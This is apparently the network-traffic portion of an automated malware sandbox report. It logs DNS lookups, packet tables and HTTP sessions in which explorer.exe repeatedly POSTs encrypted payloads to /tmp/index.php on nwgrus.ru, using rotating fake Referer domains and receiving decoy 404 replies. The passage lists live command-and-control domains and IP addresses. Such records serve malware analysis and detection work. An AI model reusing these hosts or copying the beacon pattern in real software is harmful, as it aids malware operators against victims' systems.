                                                          Oct 12, 2024 22:31:36.113661051 CEST8050049175.119.10.231192.168.2.4
                                                          Oct 12, 2024 22:31:36.114489079 CEST8050049175.119.10.231192.168.2.4
                                                          Oct 12, 2024 22:31:36.114550114 CEST5004980192.168.2.4175.119.10.231
                                                          Oct 12, 2024 22:31:36.114582062 CEST5004980192.168.2.4175.119.10.231
                                                          Oct 12, 2024 22:31:36.119816065 CEST8050049175.119.10.231192.168.2.4
                                                          Oct 12, 2024 22:31:48.989573956 CEST5005080192.168.2.4175.119.10.231
                                                          Oct 12, 2024 22:31:48.995209932 CEST8050050175.119.10.231192.168.2.4
                                                          Oct 12, 2024 22:31:48.995419025 CEST5005080192.168.2.4175.119.10.231
                                                          Oct 12, 2024 22:31:48.995564938 CEST5005080192.168.2.4175.119.10.231
                                                          Oct 12, 2024 22:31:48.995596886 CEST5005080192.168.2.4175.119.10.231
                                                          Oct 12, 2024 22:31:49.001049995 CEST8050050175.119.10.231192.168.2.4
                                                          Oct 12, 2024 22:31:49.001091003 CEST8050050175.119.10.231192.168.2.4
                                                          Oct 12, 2024 22:31:50.445827961 CEST8050050175.119.10.231192.168.2.4
                                                          Oct 12, 2024 22:31:50.445909977 CEST8050050175.119.10.231192.168.2.4
                                                          Oct 12, 2024 22:31:50.445964098 CEST5005080192.168.2.4175.119.10.231
                                                          Oct 12, 2024 22:31:50.446098089 CEST5005080192.168.2.4175.119.10.231
                                                          Oct 12, 2024 22:31:50.451061964 CEST8050050175.119.10.231192.168.2.4
                                                          Oct 12, 2024 22:32:03.959069967 CEST5005180192.168.2.4175.119.10.231
                                                          Oct 12, 2024 22:32:03.964113951 CEST8050051175.119.10.231192.168.2.4
                                                          Oct 12, 2024 22:32:03.964227915 CEST5005180192.168.2.4175.119.10.231
                                                          Oct 12, 2024 22:32:03.964360952 CEST5005180192.168.2.4175.119.10.231
                                                          Oct 12, 2024 22:32:03.964402914 CEST5005180192.168.2.4175.119.10.231
                                                          Oct 12, 2024 22:32:03.969360113 CEST8050051175.119.10.231192.168.2.4
                                                          Oct 12, 2024 22:32:03.969388962 CEST8050051175.119.10.231192.168.2.4
                                                          Oct 12, 2024 22:32:05.414036036 CEST8050051175.119.10.231192.168.2.4
                                                          Oct 12, 2024 22:32:05.414531946 CEST8050051175.119.10.231192.168.2.4
                                                          Oct 12, 2024 22:32:05.414625883 CEST5005180192.168.2.4175.119.10.231
                                                          Oct 12, 2024 22:32:05.414675951 CEST5005180192.168.2.4175.119.10.231
                                                          Oct 12, 2024 22:32:05.419831038 CEST8050051175.119.10.231192.168.2.4
                                                          TimestampSource PortDest PortSource IPDest IP
                                                          Oct 12, 2024 22:28:31.494110107 CEST6299553192.168.2.41.1.1.1
                                                          Oct 12, 2024 22:28:32.499870062 CEST6299553192.168.2.41.1.1.1
                                                          Oct 12, 2024 22:28:33.513564110 CEST6299553192.168.2.41.1.1.1
                                                          Oct 12, 2024 22:28:33.769710064 CEST53629951.1.1.1192.168.2.4
                                                          Oct 12, 2024 22:28:33.769759893 CEST53629951.1.1.1192.168.2.4
                                                          Oct 12, 2024 22:28:33.769789934 CEST53629951.1.1.1192.168.2.4
                                                          Oct 12, 2024 22:29:27.878504038 CEST5026553192.168.2.41.1.1.1
                                                          Oct 12, 2024 22:29:27.911137104 CEST53502651.1.1.1192.168.2.4
                                                          Oct 12, 2024 22:29:27.917161942 CEST5267853192.168.2.41.1.1.1
                                                          Oct 12, 2024 22:29:27.948661089 CEST53526781.1.1.1192.168.2.4
                                                          Oct 12, 2024 22:30:38.213104963 CEST5806953192.168.2.41.1.1.1
                                                          Oct 12, 2024 22:30:38.223284960 CEST53580691.1.1.1192.168.2.4
                                                          Oct 12, 2024 22:30:38.243469954 CEST5884353192.168.2.41.1.1.1
                                                          Oct 12, 2024 22:30:38.313920021 CEST53588431.1.1.1192.168.2.4
                                                          Oct 12, 2024 22:30:45.817096949 CEST5135253192.168.2.41.1.1.1
                                                          Oct 12, 2024 22:30:45.987010002 CEST53513521.1.1.1192.168.2.4
                                                          Oct 12, 2024 22:30:45.996114969 CEST5464253192.168.2.41.1.1.1
                                                          Oct 12, 2024 22:30:46.374330997 CEST53546421.1.1.1192.168.2.4
                                                          Oct 12, 2024 22:30:56.804435015 CEST5146353192.168.2.41.1.1.1
                                                          Oct 12, 2024 22:30:56.814508915 CEST53514631.1.1.1192.168.2.4
                                                          Oct 12, 2024 22:30:56.821585894 CEST5956353192.168.2.41.1.1.1
                                                          Oct 12, 2024 22:30:56.831568956 CEST53595631.1.1.1192.168.2.4
                                                          Oct 12, 2024 22:31:04.636575937 CEST6267253192.168.2.41.1.1.1
                                                          Oct 12, 2024 22:31:04.768667936 CEST53626721.1.1.1192.168.2.4
                                                          Oct 12, 2024 22:31:09.740458012 CEST5968453192.168.2.41.1.1.1
                                                          Oct 12, 2024 22:31:09.751693010 CEST53596841.1.1.1192.168.2.4
                                                          Oct 12, 2024 22:31:09.777600050 CEST5218353192.168.2.41.1.1.1
                                                          Oct 12, 2024 22:31:09.808649063 CEST53521831.1.1.1192.168.2.4
                                                          Oct 12, 2024 22:31:22.764609098 CEST5276653192.168.2.41.1.1.1
                                                          Oct 12, 2024 22:31:22.798492908 CEST53527661.1.1.1192.168.2.4
                                                          Oct 12, 2024 22:31:22.810658932 CEST6101053192.168.2.41.1.1.1
                                                          Oct 12, 2024 22:31:22.972979069 CEST53610101.1.1.1192.168.2.4
                                                          Oct 12, 2024 22:31:36.510673046 CEST5121653192.168.2.41.1.1.1
                                                          Oct 12, 2024 22:31:36.521195889 CEST53512161.1.1.1192.168.2.4
                                                          Oct 12, 2024 22:31:36.534760952 CEST4917653192.168.2.41.1.1.1
                                                          Oct 12, 2024 22:31:36.548430920 CEST53491761.1.1.1192.168.2.4
                                                          Oct 12, 2024 22:31:49.461226940 CEST5122353192.168.2.41.1.1.1
                                                          Oct 12, 2024 22:31:49.494296074 CEST53512231.1.1.1192.168.2.4
                                                          Oct 12, 2024 22:31:49.568062067 CEST5105953192.168.2.41.1.1.1
                                                          Oct 12, 2024 22:31:49.579103947 CEST53510591.1.1.1192.168.2.4
                                                          Oct 12, 2024 22:32:03.359817028 CEST6081453192.168.2.41.1.1.1
                                                          Oct 12, 2024 22:32:03.369863987 CEST53608141.1.1.1192.168.2.4
                                                          Oct 12, 2024 22:32:03.403362989 CEST6169653192.168.2.41.1.1.1
                                                          Oct 12, 2024 22:32:03.414715052 CEST53616961.1.1.1192.168.2.4
                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                          Oct 12, 2024 22:28:31.494110107 CEST192.168.2.41.1.1.10x98b1Standard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                                          Oct 12, 2024 22:28:32.499870062 CEST192.168.2.41.1.1.10x98b1Standard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                                          Oct 12, 2024 22:28:33.513564110 CEST192.168.2.41.1.1.10x98b1Standard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                                          Oct 12, 2024 22:29:27.878504038 CEST192.168.2.41.1.1.10xbacaStandard query (0)ninjahallnews.comA (IP address)IN (0x0001)false
                                                          Oct 12, 2024 22:29:27.917161942 CEST192.168.2.41.1.1.10xc63aStandard query (0)fallhandbat.comA (IP address)IN (0x0001)false
                                                          Oct 12, 2024 22:30:38.213104963 CEST192.168.2.41.1.1.10x1c9bStandard query (0)ninjahallnews.comA (IP address)IN (0x0001)false
                                                          Oct 12, 2024 22:30:38.243469954 CEST192.168.2.41.1.1.10xbdeeStandard query (0)fallhandbat.comA (IP address)IN (0x0001)false
                                                          Oct 12, 2024 22:30:45.817096949 CEST192.168.2.41.1.1.10x9961Standard query (0)ninjahallnews.comA (IP address)IN (0x0001)false
                                                          Oct 12, 2024 22:30:45.996114969 CEST192.168.2.41.1.1.10x2e21Standard query (0)fallhandbat.comA (IP address)IN (0x0001)false
                                                          Oct 12, 2024 22:30:56.804435015 CEST192.168.2.41.1.1.10x22b4Standard query (0)ninjahallnews.comA (IP address)IN (0x0001)false
                                                          Oct 12, 2024 22:30:56.821585894 CEST192.168.2.41.1.1.10xa3b6Standard query (0)fallhandbat.comA (IP address)IN (0x0001)false
                                                          Oct 12, 2024 22:31:04.636575937 CEST192.168.2.41.1.1.10xd28cStandard query (0)nwgrus.ruA (IP address)IN (0x0001)false
                                                          Oct 12, 2024 22:31:09.740458012 CEST192.168.2.41.1.1.10xeafdStandard query (0)ninjahallnews.comA (IP address)IN (0x0001)false
                                                          Oct 12, 2024 22:31:09.777600050 CEST192.168.2.41.1.1.10x7268Standard query (0)fallhandbat.comA (IP address)IN (0x0001)false
                                                          Oct 12, 2024 22:31:22.764609098 CEST192.168.2.41.1.1.10xddd9Standard query (0)ninjahallnews.comA (IP address)IN (0x0001)false
                                                          Oct 12, 2024 22:31:22.810658932 CEST192.168.2.41.1.1.10x1aabStandard query (0)fallhandbat.comA (IP address)IN (0x0001)false
                                                          Oct 12, 2024 22:31:36.510673046 CEST192.168.2.41.1.1.10x6900Standard query (0)ninjahallnews.comA (IP address)IN (0x0001)false
                                                          Oct 12, 2024 22:31:36.534760952 CEST192.168.2.41.1.1.10x8181Standard query (0)fallhandbat.comA (IP address)IN (0x0001)false
                                                          Oct 12, 2024 22:31:49.461226940 CEST192.168.2.41.1.1.10x182bStandard query (0)ninjahallnews.comA (IP address)IN (0x0001)false
                                                          Oct 12, 2024 22:31:49.568062067 CEST192.168.2.41.1.1.10xf9a6Standard query (0)fallhandbat.comA (IP address)IN (0x0001)false
                                                          Oct 12, 2024 22:32:03.359817028 CEST192.168.2.41.1.1.10x6dd3Standard query (0)ninjahallnews.comA (IP address)IN (0x0001)false
                                                          Oct 12, 2024 22:32:03.403362989 CEST192.168.2.41.1.1.10x72edStandard query (0)fallhandbat.comA (IP address)IN (0x0001)false
                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                          Oct 12, 2024 22:28:33.769710064 CEST1.1.1.1192.168.2.40x98b1No error (0)nwgrus.ru190.147.128.172A (IP address)IN (0x0001)false
                                                          Oct 12, 2024 22:28:33.769710064 CEST1.1.1.1192.168.2.40x98b1No error (0)nwgrus.ru187.211.161.52A (IP address)IN (0x0001)false
                                                          Oct 12, 2024 22:28:33.769710064 CEST1.1.1.1192.168.2.40x98b1No error (0)nwgrus.ru154.144.253.197A (IP address)IN (0x0001)false
                                                          Oct 12, 2024 22:28:33.769710064 CEST1.1.1.1192.168.2.40x98b1No error (0)nwgrus.ru189.161.95.103A (IP address)IN (0x0001)false
                                                          Oct 12, 2024 22:28:33.769710064 CEST1.1.1.1192.168.2.40x98b1No error (0)nwgrus.ru123.213.233.131A (IP address)IN (0x0001)false
                                                          Oct 12, 2024 22:28:33.769710064 CEST1.1.1.1192.168.2.40x98b1No error (0)nwgrus.ru123.212.43.225A (IP address)IN (0x0001)false
                                                          Oct 12, 2024 22:28:33.769710064 CEST1.1.1.1192.168.2.40x98b1No error (0)nwgrus.ru201.212.52.197A (IP address)IN (0x0001)false
                                                          Oct 12, 2024 22:28:33.769710064 CEST1.1.1.1192.168.2.40x98b1No error (0)nwgrus.ru220.125.3.190A (IP address)IN (0x0001)false
                                                          Oct 12, 2024 22:28:33.769710064 CEST1.1.1.1192.168.2.40x98b1No error (0)nwgrus.ru185.18.245.58A (IP address)IN (0x0001)false
                                                          Oct 12, 2024 22:28:33.769710064 CEST1.1.1.1192.168.2.40x98b1No error (0)nwgrus.ru201.191.99.134A (IP address)IN (0x0001)false
                                                          Oct 12, 2024 22:28:33.769759893 CEST1.1.1.1192.168.2.40x98b1No error (0)nwgrus.ru190.147.128.172A (IP address)IN (0x0001)false
                                                          Oct 12, 2024 22:28:33.769759893 CEST1.1.1.1192.168.2.40x98b1No error (0)nwgrus.ru187.211.161.52A (IP address)IN (0x0001)false
                                                          Oct 12, 2024 22:28:33.769759893 CEST1.1.1.1192.168.2.40x98b1No error (0)nwgrus.ru154.144.253.197A (IP address)IN (0x0001)false
                                                          Oct 12, 2024 22:28:33.769759893 CEST1.1.1.1192.168.2.40x98b1No error (0)nwgrus.ru189.161.95.103A (IP address)IN (0x0001)false
                                                          Oct 12, 2024 22:28:33.769759893 CEST1.1.1.1192.168.2.40x98b1No error (0)nwgrus.ru123.213.233.131A (IP address)IN (0x0001)false
                                                          Oct 12, 2024 22:28:33.769759893 CEST1.1.1.1192.168.2.40x98b1No error (0)nwgrus.ru123.212.43.225A (IP address)IN (0x0001)false
                                                          Oct 12, 2024 22:28:33.769759893 CEST1.1.1.1192.168.2.40x98b1No error (0)nwgrus.ru201.212.52.197A (IP address)IN (0x0001)false
                                                          Oct 12, 2024 22:28:33.769759893 CEST1.1.1.1192.168.2.40x98b1No error (0)nwgrus.ru220.125.3.190A (IP address)IN (0x0001)false
                                                          Oct 12, 2024 22:28:33.769759893 CEST1.1.1.1192.168.2.40x98b1No error (0)nwgrus.ru185.18.245.58A (IP address)IN (0x0001)false
                                                          Oct 12, 2024 22:28:33.769759893 CEST1.1.1.1192.168.2.40x98b1No error (0)nwgrus.ru201.191.99.134A (IP address)IN (0x0001)false
                                                          Oct 12, 2024 22:28:33.769789934 CEST1.1.1.1192.168.2.40x98b1No error (0)nwgrus.ru190.147.128.172A (IP address)IN (0x0001)false
                                                          Oct 12, 2024 22:28:33.769789934 CEST1.1.1.1192.168.2.40x98b1No error (0)nwgrus.ru187.211.161.52A (IP address)IN (0x0001)false
                                                          Oct 12, 2024 22:28:33.769789934 CEST1.1.1.1192.168.2.40x98b1No error (0)nwgrus.ru154.144.253.197A (IP address)IN (0x0001)false
                                                          Oct 12, 2024 22:28:33.769789934 CEST1.1.1.1192.168.2.40x98b1No error (0)nwgrus.ru189.161.95.103A (IP address)IN (0x0001)false
                                                          Oct 12, 2024 22:28:33.769789934 CEST1.1.1.1192.168.2.40x98b1No error (0)nwgrus.ru123.213.233.131A (IP address)IN (0x0001)false
                                                          Oct 12, 2024 22:28:33.769789934 CEST1.1.1.1192.168.2.40x98b1No error (0)nwgrus.ru123.212.43.225A (IP address)IN (0x0001)false
                                                          Oct 12, 2024 22:28:33.769789934 CEST1.1.1.1192.168.2.40x98b1No error (0)nwgrus.ru201.212.52.197A (IP address)IN (0x0001)false
                                                          Oct 12, 2024 22:28:33.769789934 CEST1.1.1.1192.168.2.40x98b1No error (0)nwgrus.ru220.125.3.190A (IP address)IN (0x0001)false
                                                          Oct 12, 2024 22:28:33.769789934 CEST1.1.1.1192.168.2.40x98b1No error (0)nwgrus.ru185.18.245.58A (IP address)IN (0x0001)false
                                                          Oct 12, 2024 22:28:33.769789934 CEST1.1.1.1192.168.2.40x98b1No error (0)nwgrus.ru201.191.99.134A (IP address)IN (0x0001)false
                                                          Oct 12, 2024 22:29:27.911137104 CEST1.1.1.1192.168.2.40xbacaName error (3)ninjahallnews.comnonenoneA (IP address)IN (0x0001)false
                                                          Oct 12, 2024 22:29:27.948661089 CEST1.1.1.1192.168.2.40xc63aName error (3)fallhandbat.comnonenoneA (IP address)IN (0x0001)false
                                                          Oct 12, 2024 22:30:38.223284960 CEST1.1.1.1192.168.2.40x1c9bName error (3)ninjahallnews.comnonenoneA (IP address)IN (0x0001)false
                                                          Oct 12, 2024 22:30:38.313920021 CEST1.1.1.1192.168.2.40xbdeeName error (3)fallhandbat.comnonenoneA (IP address)IN (0x0001)false
                                                          Oct 12, 2024 22:30:45.987010002 CEST1.1.1.1192.168.2.40x9961Name error (3)ninjahallnews.comnonenoneA (IP address)IN (0x0001)false
                                                          Oct 12, 2024 22:30:46.374330997 CEST1.1.1.1192.168.2.40x2e21Name error (3)fallhandbat.comnonenoneA (IP address)IN (0x0001)false
                                                          Oct 12, 2024 22:30:56.814508915 CEST1.1.1.1192.168.2.40x22b4Name error (3)ninjahallnews.comnonenoneA (IP address)IN (0x0001)false
                                                          Oct 12, 2024 22:30:56.831568956 CEST1.1.1.1192.168.2.40xa3b6Name error (3)fallhandbat.comnonenoneA (IP address)IN (0x0001)false
                                                          Oct 12, 2024 22:31:04.768667936 CEST1.1.1.1192.168.2.40xd28cNo error (0)nwgrus.ru175.119.10.231A (IP address)IN (0x0001)false
                                                          Oct 12, 2024 22:31:04.768667936 CEST1.1.1.1192.168.2.40xd28cNo error (0)nwgrus.ru190.147.128.172A (IP address)IN (0x0001)false
                                                          Oct 12, 2024 22:31:04.768667936 CEST1.1.1.1192.168.2.40xd28cNo error (0)nwgrus.ru190.220.21.28A (IP address)IN (0x0001)false
                                                          Oct 12, 2024 22:31:04.768667936 CEST1.1.1.1192.168.2.40xd28cNo error (0)nwgrus.ru190.147.2.86A (IP address)IN (0x0001)false
                                                          Oct 12, 2024 22:31:04.768667936 CEST1.1.1.1192.168.2.40xd28cNo error (0)nwgrus.ru187.211.161.52A (IP address)IN (0x0001)false
                                                          Oct 12, 2024 22:31:04.768667936 CEST1.1.1.1192.168.2.40xd28cNo error (0)nwgrus.ru212.112.110.243A (IP address)IN (0x0001)false
                                                          Oct 12, 2024 22:31:04.768667936 CEST1.1.1.1192.168.2.40xd28cNo error (0)nwgrus.ru190.224.203.37A (IP address)IN (0x0001)false
                                                          Oct 12, 2024 22:31:04.768667936 CEST1.1.1.1192.168.2.40xd28cNo error (0)nwgrus.ru186.233.231.45A (IP address)IN (0x0001)false
                                                          Oct 12, 2024 22:31:04.768667936 CEST1.1.1.1192.168.2.40xd28cNo error (0)nwgrus.ru211.171.233.126A (IP address)IN (0x0001)false
                                                          Oct 12, 2024 22:31:04.768667936 CEST1.1.1.1192.168.2.40xd28cNo error (0)nwgrus.ru177.222.41.236A (IP address)IN (0x0001)false
                                                          Oct 12, 2024 22:31:09.751693010 CEST1.1.1.1192.168.2.40xeafdName error (3)ninjahallnews.comnonenoneA (IP address)IN (0x0001)false
                                                          Oct 12, 2024 22:31:09.808649063 CEST1.1.1.1192.168.2.40x7268Name error (3)fallhandbat.comnonenoneA (IP address)IN (0x0001)false
                                                          Oct 12, 2024 22:31:22.798492908 CEST1.1.1.1192.168.2.40xddd9Name error (3)ninjahallnews.comnonenoneA (IP address)IN (0x0001)false
                                                          Oct 12, 2024 22:31:22.972979069 CEST1.1.1.1192.168.2.40x1aabName error (3)fallhandbat.comnonenoneA (IP address)IN (0x0001)false
                                                          Oct 12, 2024 22:31:36.521195889 CEST1.1.1.1192.168.2.40x6900Name error (3)ninjahallnews.comnonenoneA (IP address)IN (0x0001)false
                                                          Oct 12, 2024 22:31:36.548430920 CEST1.1.1.1192.168.2.40x8181Name error (3)fallhandbat.comnonenoneA (IP address)IN (0x0001)false
                                                          Oct 12, 2024 22:31:49.494296074 CEST1.1.1.1192.168.2.40x182bName error (3)ninjahallnews.comnonenoneA (IP address)IN (0x0001)false
                                                          Oct 12, 2024 22:31:49.579103947 CEST1.1.1.1192.168.2.40xf9a6Name error (3)fallhandbat.comnonenoneA (IP address)IN (0x0001)false
                                                          Oct 12, 2024 22:32:03.369863987 CEST1.1.1.1192.168.2.40x6dd3Name error (3)ninjahallnews.comnonenoneA (IP address)IN (0x0001)false
                                                          Oct 12, 2024 22:32:03.414715052 CEST1.1.1.1192.168.2.40x72edName error (3)fallhandbat.comnonenoneA (IP address)IN (0x0001)false
                                                          • 23.145.40.164
                                                          • mbokbuwfpvoxbkg.com
                                                            • nwgrus.ru
                                                          • pixlrdkntmlnb.com
                                                          • bycmgoqasptpbarq.net
                                                          • mkmjhgiqxobee.com
                                                          • guwkkhaqmlu.org
                                                          • ipxaqeyacookwjhd.net
                                                          • fjjppebnfln.com
                                                          • giecrmryibj.com
                                                          • ftxsovsyqtpojv.com
                                                          • bdnqdofcypmiflj.com
                                                          • sfxppmjegqvmfflo.net
                                                          • bdvavhcwwpnmuonq.com
                                                          • qvliyttnwva.com
                                                          • lcuvnbvrwwue.net
                                                          • xabseqytshw.com
                                                          • bimvjobubxq.org
                                                          • rxrarkndhoucempk.org
                                                          • pkknpuucklp.org
                                                          • pegvelqjknxdu.com
                                                          • cgelocrsuxurnrn.net
                                                          • xggjjjlvylvfsyxm.org
                                                          • dpiicsehdjnbnsmw.net
                                                          • rustqqxkqobo.net
                                                          • fvvqfcjwkkyq.org
                                                          • jskfymbttqm.com
                                                          • nfmmhijnsahycef.org
                                                          • gmtmmuxeespeb.net
                                                          • oetcuqsferjcffw.net
                                                          • ykmrlqvmvtweyurg.com
                                                          • htfrpafyilhcsfrb.org
                                                          • uphnbpophmmckayq.net
                                                          • wygnfgjkntpabtiq.org
                                                          • vhkqchnxwnhum.net
                                                          • nscyrydfuavfv.com
                                                          • cktuxsueygng.net
                                                          • dxcesnnxlrm.com
                                                          • rdmqecpndyox.com
                                                          • lqwauqujlltwos.org
                                                          • uciyasnlqtuqe.com
                                                          • ansjcylnamd.com
                                                          • xcmbohrajfpmnq.org
                                                          • elwljkaryvt.org
                                                          • ctivelvucvmgu.org
                                                          • coulxlduqqt.net
                                                          • pohgsixvlqwy.com
                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          0192.168.2.449738190.147.128.172802580C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 12, 2024 22:28:33.779191971 CEST282OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://mbokbuwfpvoxbkg.com/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 287
                                                          Host: nwgrus.ru
                                                          Oct 12, 2024 22:28:33.779207945 CEST287OUTData Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 27 1b fe ed
                                                          Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA .[k,vu'T2RkM#A2vR_U/cW9\Td<$@a6/r+r8z\'3*D7w5jbiwCPqbChn F
                                                          Oct 12, 2024 22:28:34.853705883 CEST152INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sat, 12 Oct 2024 20:28:34 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 04 00 00 00 72 e8 87 e8
                                                          Data Ascii: r


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          1192.168.2.449739190.147.128.172802580C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 12, 2024 22:28:34.871783018 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://pixlrdkntmlnb.com/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 148
                                                          Host: nwgrus.ru
                                                          Oct 12, 2024 22:28:34.872253895 CEST148OUTData Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 65 37 af 98
                                                          Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA -[k,vue7\3[`EYV7==lmR"^5.WN<<bjWh
                                                          Oct 12, 2024 22:28:36.179528952 CEST484INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sat, 12 Oct 2024 20:28:35 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          2192.168.2.449740190.147.128.172802580C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 12, 2024 22:28:36.202023029 CEST283OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
                                                          Referer: http://bycmgoqasptpbarq.net/
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                          Content-Length: 238
                                                          Host: nwgrus.ru
                                                          Oct 12, 2024 22:28:36.202045918 CEST238OUTData Raw: 3b 6e 26 18 f2 bf 1d 20 db dc c7 70 0e 05 0e bf 0e 0d c1 97 63 06 e4 15 01 08 78 e2 30 cb c2 6f e8 2e c6 5f 05 64 50 6c e8 99 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 5d 0b b8 b8
                                                          Data Ascii: ;n& pcx0o._dPl? 9Yt M@NA -[k,vu]Db_c,-OjiT+R6TB>,EAyG]}$A;/kE'6K+OWYtgUfn
                                                          Oct 12, 2024 22:28:37.289573908 CEST484INHTTP/1.1 404 Not Found
                                                          Server: nginx/1.26.0
                                                          Date: Sat, 12 Oct 2024 20:28:37 GMT
                                                          Content-Type: text/html; charset=utf-8
                                                          Connection: close
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          3192.168.2.449741190.147.128.172802580C:\Windows\explorer.exe
                                                          TimestampBytes transferredDirectionData
                                                          Oct 12, 2024 22:28:37.424860954 CEST280OUTPOST /tmp/index.php HTTP/1.1
                                                          Connection: Keep-Alive
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Accept: */*
